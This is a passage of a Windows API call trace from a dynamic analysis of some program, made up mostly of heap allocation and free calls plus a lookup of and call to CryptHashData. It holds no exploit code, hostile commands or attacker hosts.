lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0180.354] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0180.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ec8 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0180.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0180.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0180.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0180.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0180.355] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d98 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0180.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0180.356] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0180.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0180.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0180.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dc8 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0180.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0180.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0180.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0180.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e08 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0180.358] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0180.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0180.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0180.358] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0180.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0180.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0180.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0180.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0180.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0180.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0180.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.361] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0180.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0180.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.362] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0180.362] CryptHashData (hHash=0xa87610, pbData=0x2e54d98, dwDataLen=0x3, dwFlags=0x1) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0180.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0180.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 